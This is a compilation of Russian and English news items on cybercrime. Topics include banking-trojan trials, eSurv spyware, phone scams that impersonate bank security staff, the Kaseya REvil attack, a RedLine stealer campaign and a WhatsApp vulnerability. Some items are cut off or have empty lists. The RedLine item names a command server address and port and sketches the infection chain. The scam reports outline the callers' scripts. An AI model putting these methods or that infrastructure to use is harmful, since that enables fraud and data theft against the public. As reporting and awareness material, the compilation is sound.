Кроме того, злоумышленники, как следует из материалов дела, копировали данные клиентов Сбербанка, использовавшиеся для доступа к личным счетам в системе ДБО. Таким образом братья Попелыш получали неправомерный доступ к компьютерной информации, возможность копировать аутентификационные (подлинные) данные клиентов Сбербанка. Полученные таким образом сведения фигуранты передавали на управляющий сервер и с помощью удаленного доступа к интернету, подключенного к ДБО «Сбербанк ОнЛ@йн», через личные кабинеты клиентов, получив соответствующие коды доступа, направляли подложные электронные поручения на перевод денежных средств на карточки подставных лиц. За последний этап хищения, считает следствие, отвечал Александр Сарбин. Таким образом сообщники, по данным следствия, в ноябре 2013 года похитили у нескольких клиентов свыше 720 тыс. руб.
В итоге Гагаринский суд признал всех фигурантов дела виновными в кибермошенничестве. Дмитрий и Евгений Попелыши получили по семь лет лишения свободы, Даниил Шарычев — четыре года колонии, Александр Сарбин — четыре года условно, Петр Бельский — три года условно. При этом суд учел срок, который братья Попелыш и Шарычев ранее отбыли под стражей и домашним арестом, и освободил их от наказания, отменив им и подписку о невыезде. Отметим, что в прениях гособвинитель просил для всех, кроме Шарычева (для него прокурор требовал семь лет колонии), по восемь лет лишения свободы и штрафы по 300 тыс. руб. Подсудимые и их защита настаивали на оправдательном приговоре.
Это дело стало третьим для большинства фигурантов.
В сентябре 2012 года Чертановский суд Москвы рассмотрел их дело в особом порядке (они полностью признали вину, заключив досудебное соглашение с прокуратурой) и приговорил каждого из братьев Попелыш к пяти годам условно и штрафу в размере 450 тыс. руб. Александр Сарбин получил четыре года условно и 200-тысячный штраф. Фигуранты обвинялись тогда в том, что за неполный 2010 год с помощью вредоносной вирусной программы Trojan.Win32.VKhost украли у 16 клиентов ВТБ порядка 2 млн руб., а к февралю 2011 года — еще 13 млн руб., причем их жертвами, по версии следствия и решению суда, стали вкладчики 46 регионов страны.
А 18 июня 2018 года Савеловский суд Москвы признал их виновными в совершении 15 преступлений (ранее в деле фигурировало 273 эпизода) и приговорил каждого из братьев к восьми годам колонии общего режима и штрафу в 900 тыс. руб. Александру Сарбину, Даниилу Шарычеву и еще одному их предполагаемому сообщнику, Алексею Вьюкову, дали от четырех с половиной до шести лет колонии со штрафами по 700 тыс. руб. А Петр Бельский отделался условным сроком. Однако в марте 2019 года Мосгорсуд приговор отменил, отправив дело в следственный департамент на дополнительное расследование, где оно до сих пор и находится.
По словам адвоката Дмитрия Попелыша Ирины Добросельской, защита не согласна с приговором и намерена добиваться полного оправдания фигурантов. «За восемь лет существования этого дела расследование проводилось всего один год и десять дней, а еще десять месяцев следственный департамент МВД просто копировал материалы возвращенного Мосгорсудом в 2019 году дела вместо его расследования»,— заявила госпожа Добросельская. При этом, по ее словам, братьям Попелыш в 2019 году предъявили обвинение «в отсутствие возбужденных дел и за пределами сроков давности привлечения к уголовной ответственности». «А Гагаринский суд в процессе всего судебного разбирательства открыто игнорировал все доводы защиты, нарушив фундаментальные положения уголовно- процессуального и уголовного закона, направленные на защиту личности от незаконного уголовного преследования»,— добавила адвокат Добросельская.
Итальянская компания eSurv годами распространяла шпионское ПО через Google Play и продавала его правоохранительным органам своей страны. Слежка велась за простыми гражданами, не преступниками – компания выкачивала с их гаджетов персональные данные и прослушивала их. Сейчас против нее ведется расследование, ее топ-менеджеры арестованы, а саму ее признали банкротом.
Итальянский шпион
Компания eSurv, промышлявшая распространением шпионского ПО для Android- устройств и сотрудничавшая с полицией, по решению суда объявлена банкротом. Как пишет портал Vice, компания годами распространяла свои программы прямо через Google Play – официальный магазин Android-приложений компании Google.
ESurv – это итальянская компания, начинавшая свой путь как разработчик систем видеонаблюдения, но в один момент решившая открыть для себя новую сферу деятельности с учетом накопленного опыта. Vice пишет, что ее руководство захотело занять место команды Hacking Team, довольно долго занимавшейся распространением шпионского софта.
По данным Vice, eSurv не отрицала своей связи с правоохранительными органами. Наоборот, она даже разместила на своем сайте сообщение о своей победе в тендере полиции Италии на разработку некой «пассивной и активной системы перехвата».
На момент публикации материала жертвами деятельности eSurv стало около 1000 человек. Многие из них были обычными гражданами, не связанными с криминальным миром и не совершавшими никаких преступлений, однако слежка за ними все равно велась.
Специалисты eSurv маскировали шпионское мобильное ПО под безобидные приложения для получения рекламных и маркетинговых предложений от местных итальянских операторов связи и программы для улучшения работы устройств (антивирусы, оптимизаторы и др). Втайне от пользователей компания выкачивала с их смартфонов и планшетов гигабайты персональных данных, не гнушаясь даже получением доступа к микрофонам с целью прослушки.
Годы работы
Как долго eSurv занималась слежкой за Android-пользователями, и почему Google не выявила и не удалила ее опасные приложения из своего магазина, остается неизвестным. Специалисты Vice пролили свет на ее деятельность в начале апреля 2019 г., сообщив, что в период с 2017 по 2019 гг. eSurv разместила в Google Play 25 вредоносных приложений. Не исключено, что она начала заниматься этим и раньше. Все ее вредоносы специалисты по информационной безопасности объединили в одну группу под названием Exodus.
Тогда же выяснилось, что полиция провела обыск в офисе eSurv и изъяла все компьютеры по подозрению в незаконном прослушивании телефонных разговоров. Итальянская газета La Repubblica сообщила, что к делу подключилась и прокуратура – она инициировала проверку четырех топ-менежжеров компании. Среди них – глава eSurv Джузеппе Фазано (Giuseppe Fasano) и Сальваторе Ансани (Salvatore Ansani), еще один член руководства компании. По информации портала TechDirt, в конце января 2020 г. топ-менеджеры компании были арестованы.
Работа на правоохранительные органы
TechDirt пишет, что шпионское ПО eSurv семейства Exodus пользовалось у итальянских правоохранительных органов высоким спросом, притом не только у полиции. Так, например, продукцию компанию закупили прокуратура и Агентство информации и внешней безопасности Италии (L'Agenzia Informazioni e Sicurezza Esterna).
Факт использования ПО для слежки случайно обнаружил прокурор из Неаполя. Он заявил, что доступ к найденным им файлам мог получить кто угодно из любой страны мира при наличии у него логина и пароля – вся накопленная информация, полученная в результате слежки, была размещена в облаке Amazon на одном из серверов Орегоне (США), притом в незашифрованном виде.
Массив данных, обнаруженный прокурором и накопленный итальянскими силовиками, содержал тысячи фотографий, записей разговоров, личных сообщений и электронных писем, видео и других файлов, собранных со взломанных устройств. Всего на сервере было около 80 ТБ данных.
Одной из жертв слежки стала 49-летняя на тот момент жительница итальянского города Кротон. Архив с ее файлами содержал ее личные текстовые сообщения, которые она направляла родственникам и знакомым, а также 3800 записей, тайно сделанных на микрофон ее смартфона. То есть за ней следили почти постоянно, пока она занималась своими повседневными делами.
Банкротство и продолжение расследования
Промежуточным итогом расследования, фигурантом которого стала eSurv, стало ее банкротство, решение о котором 4 марта 2021 г. вынес суд итальянского города Катандзаро. Компания зарегистрирована именно в этом городе. Вердикт вынес судья Пьерпаоло Винчелли (Pierpaolo Vincelli).
Однако банкротство eSurv не означает, что уголовное расследование прекращено. Оно, как сообщил Vice неназванный источник в правоохранительных органах, еще продолжается, и не исключено, что следователи выявят новые обстоятельства незаконной деятельности eSurv.
Сотрудниками Управления по борьбе с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградской области пресечена деятельность пособников дистанционных мошенников.
«В результате оперативно-розыскных мероприятий полицейские задержали двоих неработающих местных жителей, которые передавали доступ к своему мобильному банку интернет-мошенникам. Те, в свою очередь, использовали его для оформления виртуальных банковских карт, на которые в дальнейшем переводились денежные средства обманутых граждан. За разовую передачу доступа к мобильному банку фигуранты получали порядка 10-17 тысяч рублей.
По версии оперативников, за период с 2021 по 2023 год таким образом было оформлено около 500 карт в различных кредитных организациях, которые в дальнейшем попали в руки мошенников.
Кроме того, оперативники установили, что один из задержанных, помимо оформления банковских карт, может быть причастен к приобретению сим-карт с целью регистрации на них подложных аккаунтов в различных мессенджерах, которые в дальнейшем также использовались в мошеннических целях», - сообщила официальный представитель МВД России Ирина Волк.
Следователем ГСУ ГУ МВД России по Санкт-Петербургу и Ленинградской области возбуждено уголовное дело по признакам преступления, предусмотренного статьей 187 УК РФ.
«В ходе обысков по адресам проживания фигурантов изъято 15 банковских и 80 сим-карт, ноутбук, семь мобильных телефонов и другие предметы, имеющие доказательственное значение.
В настоящее время один из задержанных заключен под стражу. В отношении другого избрана мера процессуального принуждения в виде обязательства о явке. Предварительное расследование продолжается», - добавила Ирина Волк.
• Video: https://rutube.ru/video/441dee8569f9652c3c368c64d67a34d1/?r=plemwd
Видеоблогер под ником Kitboga на глазах у нескольких тысяч своих подписчиков сумел обмануть мошенника, который надеялся выманить $4,5 млн в биткоинах.
Стример Kitboga обрел известность, обманывая разнообразных злоумышленников на глазах у своих фанатов. На этот раз он рассказал зрителям, что почти два месяца общался с мошенником, который обещал построить ему дом за криптовалюту. Для завершения сделки осталось лишь провести видеозвонок в WhatsApp, чтобы выполнить инструкции неизвестного.
Kitboga создал фейковый криптовалютный аккаунт с 74 биткоинами на сумму около 3,5 млн фунтов стерлингов ($4,5 млн). Блогер представился пожилой женщиной и пообещал отправить средства липовому подрядчику. Общаясь со злоумышленником, блогер попытался проводить транзакцию как можно дольше и намеренно вел себя так, как будто не расслышал номер кошелька мошенника. Kitboga медленно набирал текст и, к большому удовольствию зрителей, вовлекал в разговор второго человека, так называемого мужа женщины.
В какой-то момент «старушка Kitboga» сказала аферисту, будто нашла в Facebook другого человека, который способен помочь с инвестициями, если эта транзакция не состоится. Злоумышленник сразу попытался ее разубедить, назвав плохой идеей, ведь иначе она потеряет все свои сбережения: кругом одни мошенники!
Под конец Kitboga специально отправил биткоины на другой адрес, тогда как мошенник, который видел экран, уже устал кричать на свою несостоявшуюся жертву, требуя, чтобы та отменила ордер. Расстроенный из-за неудавшейся сделки мошенник отключил видеозвонок, а позднее написал поддельной старушке, что никогда ее не простит и вообще сильно ненавидит.
«Я никогда раньше не видел такой реакции. Будьте осторожны: мошенники находят своих жертв в Instagram или на Facebook, а затем пытаются убедить инвестировать криптоактивы в фейковые платформы», — выдал нравоучение Kitboga.
В прошлом году видеоблогер помог криптовалютной бирже Kraken раскрыть преступную схему, с помощью которой неизвестные похищали цифровые активы у пользователей.
CISA and the Federal Bureau of Investigation (FBI) have shared guidance for
managed service providers (MSPs) and their customers impacted by the REvil
supply-chain ransomware attack that hit the systems of Kaseya's cloud-based
MSP platform.
The two federal agencies advise MSPs affected by the Friday REvil attack to further check their systems for signs of compromise using a detection tool provided by Kaseya over the weekend and enable multi-factor authentication (MFA) on as many accounts as possible.
Furthermore, MSPs should also implement allowlists to limit access to their internal assets and protect their remote monitoring tools' admin interface using firewalls or VPNs.
The complete list of recommendations shared by CISA and the FBI for impacted MSPs includes:
MSP customers affected by the attack are advised to use and enforce MFA wherever possible and protect their backups by placing them on air-gapped systems.
CISA and the FBI advise affected MSP customers to:
The two federal agencies are involved in the worldwide incident-handling process for impacted Kaseya customers and are urging all affected MSPs and their customers to follow the guidance shared above.
"Due to the potential scale of this incident, the FBI and CISA may be unable to respond to each victim individually, but all information we receive will be useful in countering this threat," the FBI said in an [official statement](https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on- kaseya-ransomware-attack) issued over the weekend.
The White House National Security Council has also [urged victims](https://www.whitehouse.gov/briefing-room/statements- releases/2021/07/04/statement-by-deputy-national-security-advisor-for-cyber- and-emerging-technology-anne-neuberger-on-reporting-kaseya-compromises/) of this large-scale supply-chain attack to report the incident to the Internet Crime Complaint Center.
Victims were also advised to follow the guidance issued by Kaseya, including shutting down their VSA servers, as well as implementing CISA's and FBI's mitigation techniques.
We also urge you to immediately follow the guidance from Kaseya including shutting down your VSA servers and implementing CISA’s and FBI’s mitigation techniques. More information here: https://t.co/36z73m5Trg
— National Security Council (@WHNSC) July 4, 2021
Click to expand...
Click to expand...
The massive REvil ransomware attack hit multiple managed service providers who are using Kaseya's cloud-based MSP platform for patch management and client monitoring for their customers.
In all, more than 1,000 customers of 20 MSPs had their systems encrypted in the attack carefully planned to launch on midday Friday as it lined up with the US July 4th weekend, when it's common for staff to have shorter workdays.
To breach Kaseya on-premises VSA servers, the REvil affiliate behind the attack used a zero-day vulnerability (CVE-2021-30116) — Kaseya VSA is a RMM (Remote Monitoring and Management) software.
As BleepingComputer later found, Kaseya was in the process of patching after being reported privately by researchers at Dutch Institute for Vulnerability Disclosure (DIVD).
However, the REvil affiliate got their hands on the vulnerability's details and managed to exploit it before Kaseya could start tolling out a validated fix to its customers.
The REvil ransomware group claims to have encrypted over 1,000,000 systems and first demanded $70 million for a universal decryptor to decrypt all Kaseya attack victims. However, today, its operators have quickly loweried the price to $50 million.
This is the highest ransom demand to date, the previous record also belonging to REvil, asking $50 million after attacking Taiwanese electronic and computer maker Acer.
This is not the first time REvil ransomware was used in attacks hitting MSPs, with at least one of their affiliates having knowledge of the tech used by MSPs as they have previously exploited in previous incidents.
In June 2019, one of REvil's affiliates targeted MSPs via Remote Desktop using their management software to deliver ransomware installers to all of the customer endpoints they managed.
The same affiliate is also believed to have previously worked with GandCrab in attacks that compromised MSPs' networks in January 2019.
https://www.bleepingcomputer[.]com/...ance-for-victims-of-kaseya-ransomware- attack/
При этом использовались две популярные схемы:
"банковские сотрудники" продолжают запугивать латвийцев и выманивать у них пароли и другие данные интернет-банков.
аферисты предлагают выгодно вложить деньги. Таким образом конкретная семья из Кенгарагса лишилась 100 000 на "инвестициях" в криптовалюту.
Как у пенсионерки украли 1361 евро
На минувшей неделе - 6 июля, 67-летней дама в Елгаве поверила, что ей звонят банковские сотрудники, открыла мошенникам данные своего интернет-банка и потеряла 1361 евро, - сообщила представитель Управления Земгальского региона Государственной полиции Даце Калниня.
Это произошло так: пенсионерке позвонила неизвестная женщина, и на русском языке сообщила, что она является работником службы безопасности банка, а звонит в связи с тем, что неустановленные люди хотят снять деньги с ее счета, поэтому необходимо его заблокировать.
Чтобы это можно было сделать, фальшивая сотрудница банка попросила назвать личные данные, а также данные интернет-банка и банковской карты. Что пенсионерка и сделала.
Позже пострадавшая обнаружила, что с ее счета 1300 евро были перечислены на какой-то номер банковского счета в Литве, а 61 евро - на номер неизвестного счета в Эстонии.
В тот же день аналогичным образом мошенники попытались выманить пароли, данные платежной карты клиента банка, коды безопасности, а также номер пользователя интернет-банка от некоего жителя Тукумского края. Ему попытались рассказать, что "в этот самый момент, когда ему звонят, с его банковского счета уводят деньги". Однако мужчина понял, что его пытаются обмануть, и прервал разговор.
Как у юрмалчанки похитили более 45 тысяч
Почти так же на минувшей неделе лишилась денег жительница Юрмалы.
7 июля в Юрмальское отделение полиции поступила информация от местной жительницы - ей позвонила неизвестная русскоязычная женщина, которая представилась сотрудницей SEB banka и заявила, что с ее банковским счетом сейчас ведутся незаконные действия. Позже к телефонному разговору присоединилась еще одна мошенница.
К сожалению, жительница Юрмалы им поверила и выполнила инструкции мошенников, раскрыв данные банковского счета, в результате чего с ее счета в SEB banka было списано 45 197,54 евро.
По факту этого мошенничества было возбуждено уголовное дело.
По такой же схеме многие лативийцы были обмануты на более мелкие суммы - от нескольких сотен до несколько тысяч евро. У кого сколько было.
Так, жителей Алуксненского края обобрали на 14 000 евро,
Елгавского - на 10 705 евро, а в Даугавпилсе мошенникам удалось выманить 9800
евро.
Как у семьи из Кенгарагса увели 100 000
Самая большая украденная сумма за раз - почти 100 000 евро - связана с предложением купить криптовалюту.
Обманутая семья проживает в Кенгарагсе, сообщила представитель Государственной полиции Гита Гжибовска.
Жалоба на мошенничество в госполицию поступила 2 июля - женщине позвонил неизвестный с иностранного номера и предложил сделать выгодную инвестицию. Для этого она должна была зарегистрироваться на портале Matbea.com и перевести деньги со своих банковских счетов.
В итоге женщину обманом вовлекли в сделку - аферисты, расписывая будущую выгоду, бывают очень убедительны. Женщина перевела преступникам в общей сложности почти 100 000 евро.
И это не единственный случай подобных "инвестиций" - когда латвийцы сами перечисляют свои деньги на порталы/сайты мошенников.
Так, 5 июля в полицию поступила информация от жителя Елгавского края о том, что неустановленные лица, выдавая себя за кредитных брокеров, выманили у него 10 705 евро.
А жительницу Даугавпилса с помощью сайта в интернете обманули на 9800 евро.
" Мы вам поможем вернуть деньги!"
2 июля заявление о мошенничестве было получено также и в Алуксненском отделении Государственной полиции.
Посрадавшая сообщила, что в апреле прошлого года она увидела в интернете рекламу, призывающую вложить деньги на бирже. Всего с сентября 2020-го года она 23 раза "вкладывала" туда деньги, потеряв в общей сложности 14 000 евро.
Но это еще не все. Особый цинизм ситуации в том, что 1 июля этого года пострадавшей даме по мобильному приложению WhatsApp позвонил некий мужчина и предложил помочь вернуть потерянные средства.
После получения личных данных пострадавшей, а также данных доступа к интернет- банку на имя жертвы были взяты "быстрые кредиты" на общую сумму 215 евро.
Так что не стоит думать: если нет денег на счету, вы в безопасности. На жертву вполне могут навесить еще и долги.
Преступники организовали «сall-центры» в украинском городе Днепр и обманули оттуда более 665 граждан Чехии на более чем 7 млн 609 тыс евро, что в эквиваленте составляет 300 млн 733 тыс. грн.
Сейчас следователи и работники Департамента борьбы с наркопреступностью Нацполиции под конвоем Национальной гвардии Украины передали пятерых мошенников представителям правоохранительных органов Чешской республики в международном пункте пропуска «Краковец» Львовской области. Шестой злоумышленник будет экстрадирован уже в ближайшее время.
К расследованию этого производства были привлечены более 100 украинских и чешских полицейских, работавших при процессуальном руководстве Офиса генерального прокурора и поддержке Европола и Евроюста в составе JIT The Joint Investigation Team.
Оперативно пресечь преступную деятельность международной ОПГ правоохранителям помогла JIT - соглашение о создании совместной следственной группы, заключенной между украинскими и чешскими правоохранителями.
Напомним, что в ходе досудебного расследования полицейскими было установлено двух организаторов этого «call-центра» - граждан Украины и Чехии, которые привлекли к работе в преступной организации более 20 человек.
Во время звонков мошенники пользовались технологией спуфинга, то есть подменой телефонного номера на любой нужный. Представляясь сотрудниками службы безопасности банковского учреждения, мошенники сообщали жертвам, что их банковский счет взломан, а для сохранности средств нужно временно перевести их на другой, предоставленный преступниками «безопасный» счет.
Достоверность этой информации подтверждали другим звонком - якобы, от полицейского, подтверждавшего достоверность взлома счета и необходимости перевода денег на другой счет.
В рамках обысков, состоявшихся в г. Днепр в апреле 2023 года, следователи задержали граждан Чехии, которые 25 сентября 2023 были переданы чешским правоохранителям для дальнейшего досудебного расследования.
Сейчас в отношении них чешские компетентные органы расследуют уголовное дело по факту мошенничества, предусмотренного ч.1, ч.5. а) статьи 209 Уголовного Кодекса Чешской Республики, за что фигурантам грозит от 5 до 10 лет лишения свободы.
В отношении других фигурантов следователи Нацполиции расследуют уголовное производство по ч. 4 ст. 190 (Мошенничество, совершенное в особо крупных размерах) и ч. 1., ч. 2 ст. 255 (Создание, руководство преступным сообществом или преступной организацией, а также участие в ней) Уголовного Кодекса Украины, за что фигурантам грозит от 7 до 12 лет лишения свободы.
Аналитик и эксперт по безопасности с ником OKHotshot выяснил, что с декабря 2021 года не менее 900 серверов Discord были скомпрометированы для проведения фишинговых атак, причем за последние три месяца наблюдается заметный рост.
По данным эксперта, такие атаки затронули по меньшей мере 32 000 кошельков жертв за последние девять месяцев. Всего мошенники украли невзаимозаменяемые токены (NFT) и криптовалюту на сумму в $73 млн.
Еще один эксперт по безопасности с ником Plam заявил, что порядка 95%
взломщиков серверов — дети младше 18 лет, и они все еще учатся в старшей
школе.
«Я лично разговаривал со многими из них и знаю, что они все еще учатся в
школе. Они покупают ноутбук, несколько телефонов, обувь и тратят огромные
деньги на Roblox. Все они по большей части играют в Roblox», — отметил он.
Суд рассмотрит ходатайство о помещении в психбольницу ученого Сергея Абрамова.
Абрамов возглавлял Институт программных систем им. Айламазяна РАН и руководил
программами по разработке суперкомпьютеров.
Его обвиняют в финансировании экстремистской организации и ходатайствуют о
помещении в психбольницу.
Сергей Абрамов (Фото: Юрий Машков / ТАСС)
30 ноября Ленинский районный суд Ярославля начнет рассмотрение ходатайства о
помещении члена-корреспондента РАН и одного из ведущих специалистов
по суперкомпьютерным системам Сергея Абрамова (включен в
перечень
террористов и экстремистов) в психиатрический стационар, сказали РБК в пресс-
службе Ярославского областного суда.
Ранее об этом [сообщило](https://www.t-invariant.org/2023/11/superkompyuter-v-
plenu-u-fsb-k-chlen-korrespondentu-ran-reshili-primenit-statsionarnuyu-
psihiatriyu/) издание T-invariant, уточнив, что Абрамова могут отправить в
стационар минимум на три недели для «проведения стационарной экспертизы».
Рассмотрение этого ходатайства, по словам представителя суда, пройдет в
закрытом режиме.
Ученого обвиняют в финансировании экстремистской организации (ч. 1 ст. 282.3
УК) и на данный момент он находится под «подпиской о невыезде и надлежащем
поведении».
Как ранее [сообщал](https://www.t-invariant.org/2023/06/pozhertvovanie-
ekstremistam-ili-izmena-rodine-fsb-dolgo-vela-krupnogo-akademicheskogo-
rukovoditelya-k-arestu/) T-invariant, силовики пришли с обыском к Абрамову 10
апреля, после чего он более суток провел в СИЗО и в итоге был помещен под
домашний арест.
По данным источников «Коммерсанта»,
Абрамова обвиняют в перечислении денег Фонду борьбы с коррупцией (ФБК, признан
иноагентом и экстремистской организацией, запрещен в России).
Расследованием уголовного дела занимаются сотрудники ФСБ.
Сергей Абрамов — доктор физико-математических наук, специалист в области системного программирования и IT.
С 2003 по 2022 год он был исполняющим обязанности директора и директором Института программных систем, который находится в селе Веськово городского округа Переславль-Залесский.
В 2006 году Сергей Абрамов получил премию правительства страны в области науки и техники за разработку высокопроизводительных вычислительных систем (суперкомпьютеров) семейства «Скиф».
Лауреат премии правительства в области науки и техники, а также премии РАН и Национальной академии наук Белоруссии и премии имени Лебедева.Click to expand...
Абрамов рассказал T-invariant, что это уже четвертая попытка его «в чем-то»
обвинить.
«Мне повезло, что это случилось в те вегетарианские времена, если бы это
происходило позже, то мы бы сейчас с вами не разговаривали.
А вообще это уже четвертая попытка меня в чем-то обвинить, и только на этот
раз зашли так далеко», — рассказал ученый.
По словам Абрамова, после [включения](https://fedsfm.ru/documents/terrorists-
catalog-portal-act) в перечень террористов и экстремистов все его личные счета
были заблокированы, также были заблокированы счета четырех юрлиц, связанных с
ним.
Две компании, ООО «Иммерс» и ООО «Скирус», занимаются суперкомпьютерными
технологиями. Кроме того, ООО «Иммерс» и ООО «Чуткий дом» — резиденты
«Сколково».
«Я должен был активно участвовать в трех крупных суперкомпьютерных проектах,
общее финансирование которых порядка 65 млрд руб.
Один проект — чисто российский, один — совместный между Россией и Белоруссией,
еще один — на уровне стран ЕврАзЭС.
В итоге больше полугода потеряны, все проекты стоят, а ведь в нашей теме за
полгода технологии убегают в два раза», — рассказал Абрамов.
Последний суперкомпьютер уровня мирового топ-500, по словам Абрамова, был
сделан в России в 2014 году.
Свою вину он не признает и отмечает, что никакие переводы экстремистским
организациям не совершал.
Летом 2022 года в России задержали нескольких ученых, которых заподозрили в
госизмене.
Среди них был доктор физико-математических наук, заведующий лабораторией
квантовых оптических технологий Новосибирского государственного университета
Дмитрий
Колкер.
По словам его сына, ученому вменяли предоставление Китаю сведений, содержащих
гостайну. Колкер болел раком и
умер через
несколько дней после задержания.
По делу о госизмене также
арестовали
главу Института теоретической и прикладной механики им. Христиановича
Сибирского отделения РАН Александра Шиплюка и главного научного сотрудника
института Анатолия Маслова.
Последнего, по
словам источника
ТАСС, заподозрили в предоставлении данных о гиперзвуке,
содержащих гостайну. Оба ученых занимались аэрогазодинамикой.
В мае стало
известно
об аресте новосибирского физика Валерия Звегинцева, также по статье о
госизмене.
Тогда сотрудники Института теоретической и прикладной механики им.
Христиановича опубликовали открытое письмо, в котором подчеркнули,
что все арестованные ученые известны своими «блестящими научными
результатами», посвятили свои жизни служению российской науке и «всегда
оставались верны интересам страны».
«Материалы всех трех уголовных дел закрыты от общества, однако мы знаем из
открытых источников, что деяния, за которые наши коллеги могут провести за
решеткой все оставшиеся годы жизни,
представляют собой то, что во всем мире и в том числе в России, считается
просто обязательной составляющей добросовестной и качественной научной
деятельности — выступление с докладами
на международных семинарах и конференциях, публикация статей в
высокорейтинговых журналах, участие в международных научных проектах», —
заявили сотрудники института.
Ученые также указали, что уже не понимают, как им «делать свое дело»,
поскольку «любая статья или доклад может стать причиной обвинений в
государственной измене».
«Самым страшным в данной ситуации является влияние создавшейся атмосферы на
научную молодежь. Уже сейчас лучшие студенты отказываются идти к нам работать,
а наши лучшие молодые сотрудники уходят из науки.
Ряд научных направлений, критически важных для создания фундаментального
задела, необходимого для создания аэрокосмической техники будущего,
просто закрывается, потому что сотрудники боятся заниматься такими
исследованиями», — заключили авторы письма.
Source -> https://www.rbc.ru/society/30/11/2023/656821509a794772e9533208
Исследователи из Bitdefender обнаружили новую кампанию киберпреступников, использующих набор эксплойтов RIG для распространения знаменитого вредоноса RedLine, задача которого — красть данные жертвы и передавать их операторам.
Интересно, что наборы эксплойтов вроде RIG, пользовавшиеся ранее приличной популярностью, на сегодняшний день всё больше отходят в тень. А всё благодаря усовершенствованным механизмам защиты браузеров и отказ от «дырявых» технологий вроде Flash Player и Microsoft Sillverlight.
Тем не менее использующие наборы эксплойтов злоумышленники всё ещё могут пробить отдельных пользователей, которые привыкли не обновлять браузер. Например, в описанной Bitdefender кампании RIG доставляет инфостилера с помощью эксплуатации бага в Internet Explorer.
Речь идёт об уязвимости под идентификатором CVE-2021-26411, которая приводит к повреждению памяти при просмотре специально созданного веб-сайта. Если пользователя заманить на такой ресурс, в его систему установится зловред RedLine.
Окопавшись в системе, RedLine собирает и отправляет операторам конфиденциальную информацию: ключи от криптокошельков, данные банковских карт, а также логины и пароли, сохранённые в браузерах.
[Согласно отчёту](https://www.bitdefender.com/blog/labs/redline-stealer- resurfaces-in-fresh-rig-exploit-kit-campaign/) исследователей из Bitdefender, эксплойт сначала сбрасывает в систему файл JavaScript (помещается во временную директорию), который уже после этого загружает и запускает зашифрованный RC4 пейлоад.
Распаковка RedLine представляет собой шестиступенчатый процесс, состоящий из декомпрессии, извлечения ключей, сборки и т. п. В результате файлам в формате DLL удаётся успешно избежать детектирования антивирусными средствами.
К командному серверу по адресу 185.215.113.121 вредонос подключается по порту 15386. Туда же отправляются данные, собранные из VPN - и FTP-клиентов, Discord, Telegram, Steam и криптокошельков.
Американская прокуратура обвинила жителя Пенсильвании Джоша Холла в мошенничестве и краже персональной информации в связи с тем, что он выдавал себя в социальных сетях за сестру бывшего президента США Дональда Трампа и предположительно занимался краудфандингом под ложным предлогом, сообщает Reuters.
В обвинительном заключении утверждается, что 22-летний американец создал платформу — закрытую в данный момент — для сбора денежных средств якобы на электоральную кампанию по переизбранию Трампа на второй президентский срок, но на самом деле все полученные средства тратил на личные нужды.
В ходе краудфандинга он заверял, что работает на организацию, которую поддерживают непосредственно члены семьи Трампа, указывается в материале агентства. По предварительной оценке американской прокуратуры, таким образом ему удалось получить «тысячи долларов».
Что касается членов семьи Трампа, Холл зарегистрировал несколько фейковых аккаунтов политических деятелей в Twitter, один из которых позиционировался как персональная страница сестры экс-президента США Элизабет Трамп-Грау.
Используя этот профиль, обвиняемый распространял ряд заявлений политического характера, чем привлек внимание ряда СМИ, а затем и самого Трампа, который, думая, что аккаунт действительно принадлежит его родственнице, написал в Twitter слова благодарности за поддержку, говорится в материале.
«Я подумал: Боже мой. Он действительно думает, что это его сестра», — заявил в декабре прошлого года Холл в интервью New York TImes. При этом он тогда отметил, что за его действиями не было «гнусного намерения», ведь он пытался «повеселиться» и сплотить сторонников Трампа, указывает Reuters.
По информации агентства, в случае признания Холла виновным ему грозит до 22 лет лишения свободы.
Речь идет о данных подозреваемых в жестоком обращении с детьми и терроризме.
Telegram передавал немецкой полиции персональные данные пользователей. Об этом сообщило издание Spiegel.
По данным издания, речь идет о данных подозреваемых в жестоком обращении с детьми и терроризме. Однако в случае других уголовных преступлений немецким следователям по-прежнему сложно получить информацию от Telegram.
Павел Дуров принимал участие в передачи конфиденциальных данных пользователей и присутствовал на видеоконференции с немецкими властями.
Во время встречи Федеральное ведомство уголовной полиции Германии (ВКА) сообщило Telegram о более чем сотне немецких каналов и групп, нарушающих законодательство страны. В настоящее время почти все из них были заблокированы.
Участники встречи охарактеризовали обмен мнениями как исключительно дружеский и конструктивный. Дуров подчеркнул важность немецкого рынка и дал понять, что серьезно отнесется к опасениям и требованиям властей.
sourcE: spiegel.de/netzwelt/apps/telegram-gibt-nutzerdaten-an-das- bundeskriminalamt-a-0e4d3fcb-8081-4b87-b062-db412bbc294b
could have been exploited to remotely hack the victim’s device.
WhatsApp recently addressed two security vulnerabilities in its app for Android that could have been exploited by remote attackers to execute malicious code on a target device and potentially eavesdrop on communications.
The vulnerabilities allow attackers to conduct “man-in-the-disk” attacks that are usually possible when mobile apps improperly manage External Storage that is shared across all applications on the device.
The attacks stem from the ability of attackers to compromise an app by manipulating certain data being exchanged between it and the external storage.
“we will have a look at how a simple phishing attack through an Android messaging application could result in the direct leakage of data found in External Storage (/sdcard). Then we will show how the two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions.” reads the [analysis](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote- exploitation-CVE-2021-24027/) of researchers from Census Labs which reported one of the two issues(CVE-2021-24027). “With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise [05] protocol keys used for end-to-end encryption in user communications.”
The CVE-2021-24027 flaw stems from the implementation of [content providers](https://census-labs.com/news/2021/04/14/whatsapp-exposure-of- cryptographic-material-to-third-party-apps/) in Chrome, which is an IPC mechanism that is used by an application to share resources with any other application, and a same-origin policy bypass in the browser (CVE-2020-6516).
An attacker can trigger the issue by sending a specially-crafted HTML file to a victim via WhatsApp, which once opened in the victim’s browser, executes the attacker’s code contained in the HTML file.
The code could also allow attackers to access data stored in the external storage. This attack could be exploited to access data stored by WhatsApp, including TLS session keys which are stored in a sub-directory.
